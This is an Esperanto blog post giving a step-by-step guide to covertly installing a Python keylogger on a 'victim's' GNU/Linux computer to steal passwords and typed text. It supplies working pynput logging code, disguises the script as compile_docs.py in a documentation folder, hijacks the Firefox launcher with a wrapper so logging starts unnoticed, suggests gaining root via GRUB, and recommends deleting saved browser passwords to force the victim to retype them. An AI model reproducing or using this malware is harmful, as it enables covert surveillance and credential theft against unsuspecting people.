Author: Jorge Maldonado Ventura
Category: Python
Date: 2023-02-01 16:00
Lang: eo
Slug: registrador-de-teclas-i-langenkeyloggeri-básico-para-gnulinux
Tags: klavaroregistrilo, hack, keylogger, macOS, Python, sekureco, Windows
Save_as: baza-klavaroregistrilo-por-GNU-Linukso-ŝteli-pasvortojn-kaj-tajpitajn-informojn/index.html
URL: baza-klavaroregistrilo-por-GNU-Linukso-ŝteli-pasvortojn-kaj-tajpitajn-informojn/
Title: Baza klavaroregistrilo (<i lang="en">keylogger</i>) por GNU/Linukso. Ŝteli pasvortojn kaj tajpitajn informojn
Image: <img src="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png" alt="" width="1200" height="675" srcset="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png 1200w, /wp-content/uploads/2023/02/registrador-de-teclas-con-Python-600x337.png 600w" sizes="(max-width: 1200px) 100vw, 1200px">

Simpla maniero ŝteli pasvortojn estas instali klavaroregistrilon
(<i lang="en">keylogger</i>) en la komputilo de nia viktimo. Mi montros
kiel fari tion en GNU/Linukso per la Python-programlingvo.

Unue ni devas akiri permesojn de ĉefuzanto. Se la komputilo estas
administrita de ni, ni jam scias la pasvorton. Se tio ne estas nia
okazo, ni povas [akiri aliron de ĉefuzanto per GRUB](https://byte-mind.net/obtener-acceso-root-desde-grub-linux/). Per la necesaj permesoj ni jam povas instali la klavaroregistrilon.

Unue, oni devas instali la `pynput`-bibliotekon per...

    :::bash
    sudo pip install pynput

Sekve ni devas skribi la klavaroregistrilon. Jen la kodo, kiun ni uzos:

    :::python
    #!/usr/bin/env python3
    from pynput.keyboard import Key, Listener
    import logging

    log_dir = "/usr/share/doc/python3/"

    logging.basicConfig(filename=(log_dir + "log"), \
            level=logging.DEBUG, format='%(asctime)s: %(message)s')

    def on_press(key):
        logging.info(str(key))

    with Listener(on_press=on_press) as listener:
        listener.join()

La klavaroregistrilo konserviĝas en `log_dir`. Mi, ĉi-okaze, specifis la
dokumentaran dosieron de Python 3 en GNU/Linukso. Ni ankaŭ povas
konservi la klavaroregistrilon en tiun dosierujon, eble uzante la nomon
<code>compile_docs.py</code> aŭ iun similan, por ne altiri la atenton.
Plej bone estas elekti dosierujon, kiun la viktimo ne eniros, por eviti,
ke ri ne rimarku tion, kion ni faras.

Fine ni devus plenumi la programon ĉiam, kiam oni ŝaltu la komputilon aŭ
programo estu plenumita, <span id="paŝo2">sen ke la viktimo rimarku</span>. Se, ekzemple, ni
volas startigi la klavaroregistrilon ĉiam, kiam la uzanto malfermu
Firefox-on, ni povas modifi la Firefox-komandon. <!-- more -->Ni povas alinomi
`firefox`[^1] al `firefox.bin` kaj krei la jenan dosieron nomitan
`firefox`.

    :::bash
    python3 /usr/share/doc/python3/compile_docs.py &
    exec firefox.bin "$@"

Por scii kiu `firefox`-dosiero estas plenumita, kiam ni premas ĝian
bildeton, ni devas iri al
`/usr/share/applications`, eniri la dosieron `firefox.desktop` (aŭ
`firefox-esr.desktop`) kaj serĉi la linion, kiu komenciĝas per `Exec`.

Sekve ni devus doni al ĝi skribpermesojn por aliaj uzantoj malsamaj ol
`root` al la dosierujo, kie ni konservos la klavaroregistrilon:

    :::bash
    sudo chmod o+w /usr/share/doc/python3

Finfine ni devus atendi ĝis la viktimo uzu la komputilo por atingi riajn
pasvortojn aŭ ĉian ajn informon, kiun ri tajpu, kiun ni volas akiri. La
registroj de klavoj estos konservita en la dosiero
`/usr/share/doc/python3/log`. Sed estu singarda: la dosiero povus preni
multe da spaco, se vi ne forigas ĝin de tempo al tempo; do plej bone
estus malinstali la klavaroregistrilon post la akiro de la informoj,
kiujn vi bezonas. Alia opcio estas agordi ĝin, por ke ĝi [sendu la
informon de tajpado per retpoŝto anstataŭ konservi ĝin en dosieron](/eo/klavaroregistrilo-por-GNU-linukso-retpoŝte-sendi-informo-kaj-detruiĝi/). Tiel
ĝi ne prenus multe da spaco en la viktimula komputilo; sed tiu metodo
postulas, ke ni uzu retadreson[^2].

Se la viktimo havas la pasvortojn konservitajn en la retumilo kaj ne
bezonas skribi ilin denove, ni povas forigi la dosieron de pasvortoj,
por ke ĝi estu devigita enigi ilin denove. Resume, ni povas ruze akiri
multe da informo, speciale se ni uzas ĉi tiun metodon kontraŭ
amatoraj uzantoj, kiuj ne multe suspektos. Por progresintaj uzantoj eble
plej bonas kompili la `compile_docs.py`-programon per
[Nuitka](https://nuitka.net/), [kiel mi montras en la sekva
artikolo](/eo/klavaroregistrilo-por-GNU-linukso-retpoŝte-sendi-informo-kaj-detruiĝi/).

[^1]: En Debiano ni devus modifi la `firefox-esr`-dosieron.
[^2]: La avantaĝo sendi la pasvortojn per retpoŝto estas, ke ni ne
    bezonas reveni al la komputilo de la viktimo por malfermi la
    dosieron de klavoprotokolo, sed ni ricevos la informojn de tempo al
    tempo per retpoŝto.
